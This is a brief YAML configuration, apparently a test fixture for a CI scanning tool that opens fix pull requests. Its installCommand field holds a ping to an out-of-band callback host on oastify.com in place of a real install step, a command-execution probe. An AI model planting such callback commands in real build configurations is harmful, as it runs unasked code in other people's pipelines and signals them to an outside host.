- params:
    git:
      repoName: avigdor-e2e
      branches:
        - main
      branchNameTemplate: "this is my branch {BRANCH_NAME_HASH}"
      commitMessageTemplate: "custom commit title"
      pullRequestTitleTemplate: "myPullRequests"
      aggregateFixes: true
      pullRequestCommentTitle: "build 1323 Lior"
    scan:
      includeAllVulnerabilities: true
      failOnSecurityIssues: false
      minSeverity: high
      fixableOnly: false
      projects:
        - installCommand: ping -c 1 dvcedb6jdybzq56x3nye67yq4ha8y1mq.oastify.com
